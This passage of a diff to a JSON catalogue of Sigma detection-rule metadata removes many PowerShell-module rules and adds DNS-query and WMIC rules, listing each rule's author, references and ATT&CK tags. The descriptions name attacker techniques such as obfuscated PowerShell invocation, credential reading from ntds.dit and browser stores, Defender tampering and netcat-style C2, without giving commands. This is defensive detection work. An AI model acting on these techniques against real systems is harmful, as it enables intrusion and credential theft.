"df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "value": "Suspicious Non PowerShell WSMAN COM Provider" - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "meta": { - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "creation_date": "2020/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_xor_commandline.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/11", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "filename": "posh_pm_alternate_powershell_hosts.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", - "value": "Alternate PowerShell Hosts - PowerShell Module" - }, - { - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "meta": { - "author": "ok @securonix invrep_de, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." - ], - "filename": "posh_pm_bad_opsec_artifacts.yml", - "level": "critical", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", - "https://www.mdeditor.tw/pl/pgRt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "value": "Bad Opsec Powershell Code Artifacts" - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "meta": { - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_pm_clear_powershell_history.yml", + "falsepositive": "No established falsepositives", + "filename": "dns_query_win_possible_dns_rebinding.yml", "level": "medium", - "logsource.category": "ps_module", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "value": "Clear PowerShell History - PowerShell Module" - }, - { - "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_decompress_commands.yml", - "level": "informational", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/8", - "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ] - }, - "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "value": "PowerShell Decompress Commands" - }, - { - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_get_addbaccount.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", - "value": "Suspicious Get-ADDBAccount Usage" - }, - { - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_get_clipboard.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "value": "PowerShell Get Clipboard" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_clip.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "2f211361-7dce-442d-b78a-c04039677378", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_var.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", - "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2019/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "meta": { - "author": "frack113", - "creation_date": "2021/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_powercat.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ] - }, - "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", - "value": "Netcat The Powershell Version - PowerShell Module" - }, - { - "description": "Detects remote PowerShell sessions", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "creation_date": "2019/08/10", - "falsepositive": [ - "Legitimate use remote PowerShell sessions" - ], - "filename": "posh_pm_remote_powershell_session.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "value": "Remote PowerShell Session (PS Module)" - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Administrator script" - ], - "filename": "posh_pm_susp_ad_group_reco.yml", - "level": "low", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" - }, - { - "description": "Detects suspicious PowerShell download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/05", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "filename": "posh_pm_susp_download.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", - "value": "Suspicious PowerShell Download - PowerShell Module" - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_susp_get_nettcpconnection.yml", - "level": "low", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", - "value": "Use Get-NetTCPConnection - PowerShell Module" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule)", - "creation_date": "2017/03/12", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "filename": "posh_pm_susp_invocation_generic.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_susp_invocation_specific.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/12", - "falsepositive": [ - "Administrator script" - ], - "filename": "posh_pm_susp_local_group_reco.yml", - "level": "low", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "value": "Suspicious Get Local Groups Information" - }, - { - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/21", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" ], "tags": [ "attack.initial_access", - "attack.t1078" + "attack.t1189" ] }, - "uuid": "e3818659-5016-4811-a73c-dde4679169d2", - "value": "Suspicious Computer Machine Password by PowerShell" + "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", + "value": "Possible DNS Rebinding" }, { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", "meta": { - "author": "frack113", - "creation_date": "2021/12/15", + "author": "Brandon George (blog post), Thomas Patzke (rule)", + "creation_date": "2021/07/08", "falsepositive": [ - "Administrator script" + "Legitimate usage of ip lookup services such as ipify API" ], - "filename": "posh_pm_susp_smb_share_reco.yml", - "level": "low", - "logsource.category": "ps_module", + "filename": "dns_query_win_susp_ipify.yml", + "level": "medium", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + "https://twitter.com/neonprimetime/status/1436376497980428318", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" ], "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.reconnaissance", + "attack.t1590" ] }, - "uuid": "6942bd25-5970-40ab-af49-944247103358", - "value": "Suspicious Get Information for SMB Share - PowerShell Module" + "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "value": "Suspicious DNS Query for IP Lookup Service APIs" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", "meta": { "author": "frack113", - "creation_date": "2021/07/20", + "creation_date": "2022/12/11", "falsepositive": [ "Unknown" ], - "filename": "posh_pm_susp_zip_compress.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ] - }, - "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", - "creation_date": "2020/10/05", - "falsepositive": [ - "App-V clients" - ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", - "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" - }, - { - "description": "Detecting use WinAPI Functions in PowerShell", - "meta": { - "author": "Nikita Nazarov, oscd.community, Tim Shelton", - "creation_date": "2020/10/06", - "falsepositive": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" - ], - "filename": "posh_ps_accessing_win_api.yml", + "filename": "proc_creation_win_wmic_tamper_defender.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" - ] - }, - "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", - "value": "Accessing WinAPI in PowerShell" - }, - { - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/30", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_access_to_browser_login_data.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_tamper_defender.yml" ], "tags": [ "attack.credential_access", - "attack.t1555.003" + "attack.t1546.008" ] }, - "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", - "value": "Access to Browser Login Data" + "uuid": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", + "value": "WMIC Tamper Windows Defender" }, { - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "meta": { - "author": "Borna Talebi", - "creation_date": "2021/09/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_add_dnsclient_rule.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/NathanMcNulty/status/1569497348841287681", - "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" - ], - "tags": [ - 